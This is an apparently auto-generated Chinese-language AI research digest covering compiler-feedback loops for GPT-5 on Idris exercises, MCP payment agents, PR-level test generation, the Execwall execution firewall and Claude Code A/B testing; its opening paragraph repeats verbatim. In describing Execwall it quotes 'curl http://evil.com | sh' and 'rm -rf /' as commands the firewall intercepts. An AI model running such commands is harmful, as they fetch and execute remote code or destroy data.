今天的主题很集中:AI系统开始从“会生成”走向“可验证、可约束、可接入真实流程”。最有证据力度的,不是更高模型分数,而是反馈回路、测试绑定和执行层防线。一个最强信号来自低资源代码能力。USC的Idris研究表明,给GPT-5更多文档帮助有限,但把编译器报错接入循环后,56道题的成功率可从39%拉到96%。这类结果很重要,因为它说明在规则明确的任务里,外部可验证器能直接放大模型能力。
今天的主题很集中:AI系统开始从“会生成”走向“可验证、可约束、可接入真实流程”。最有证据力度的,不是更高模型分数,而是反馈回路、测试绑定和执行层防线。一个最强信号来自低资源代码能力。USC的Idris研究表明,给GPT-5更多文档帮助有限,但把编译器报错接入循环后,56道题的成功率可从39%拉到96%。这类结果很重要,因为它说明在规则明确的任务里,外部可验证器能直接放大模型能力。
今天与历史窗口保持连续性的主线有两条:一是可验证过程仍是代码与代理系统最可靠的增益来源;二是治理与约束继续前移到真实生产流程。更具体地看,prev2已经由ExecVerify等工作把“步骤可验证”推成主轴。当前窗口里,USC的Idris实验进一步证明,这类信号不只适用于训练,也能直接驱动推理时修正:编译器错误回路把GPT-5从39%推到96%,而补资料只到low60s。
与 代码智能走向过程学习,软件代理转向真实评测与可审计执行 (2026-03-11) 中 ExecVerify 和“代码智能转向过程监督与可验证推理”的主线一致,今天最强证据仍然来自可验证过程信号。不同的是,USC 的 Idris 工作把监督从训练期推到推理期:GPT-5 在 56 道 Exercism Idris 题上,从 22/56(39%)借助编译器报错循环升到约 54/56(96%),而单纯补文档只到 low 60s。可验证反馈继续被证明比静态说明更有杠杆。
相较 MCP代理基础设施与生产治理同步升温 (2026-03-12) 里 MCP 主要承担浏览器、记忆等代理接口层,今天开始出现更贴近业务动作的接入尝试。Ask HN: Has anyone built an AI agent that spends real money? 已把 Stripe、PayPal、虚拟卡封装进 MCP server,但碰到 3D Secure 的 off-session 支付限制、发卡机构不配合、平台反自动化和 Amazon v. Perplexity 所代表的法律风险。MCP 仍在扩展,但新摩擦不再只是技术接线,而是支付、合规和平台制度。
代码智能的焦点从“多喂文档”转向“给可验证反馈”。USC 的 Idris 研究显示,GPT-5 在 56 道练习上,开箱即用仅 22/56(39%),加入编译器反馈循环后升至 96%。这说明在低资源但规则清晰的任务里,外部判定器本身就是能力放大器。
另一条线索是把测试前移到 PR。相关系统直接读取 diff、依赖图和 Jira/需求描述,生成与代码引用和 requirement ID 绑定的端到端测试与覆盖报告。证据仍偏工程演示,但方向很明确:AI 编码之后,真实用户路径的验证正在补位。
安全议题继续升温,而且位置更靠后端执行层。Execwall 以 ModelScope ms-agent 的 CVE-2026-2256 为动机,在 shell 与内核之间加执行防火墙,可拦截 curl http://evil.com | sh 和 rm -rf /。另一篇案例则把“vibe-coded”上线风险具体化:前端暴露 Stripe secret key、24 个漏洞、25 个安全测试全部失败,且开放面板可无认证返回 340 条用户记录。
代理系统开始争夺“最便宜的可用上下文”。一条路线把邮箱视为现成底座,声称单次 OAuth 可在 1 分钟内形成职业世界模型;另一条路线尝试把支付接入做成 MCP 服务,但很快撞上 3D Secure、发卡机构、网站反自动化与法律风险。共通信号是:代理要进入真实流程,难点已不只是推理,而是上下文接入与制度摩擦。
除了能力和安全,产品治理也浮出水面。关于 Claude Code 的案例指出,核心工作流上的隐式 A/B 测试会直接影响专业用户体验。最激进变体把 plan mode 压到 40 行,覆盖几千名用户,但工程师称对 rate limits 改善不明显并已结束实验。AI 工具开始像生产软件一样面对透明度、可配置性与退出机制问题。
Turn arXiv, Hacker News, OpenReview, Hugging Face Daily Papers, and RSS into local Markdown, Obsidian notes, Telegram digests, and a public site.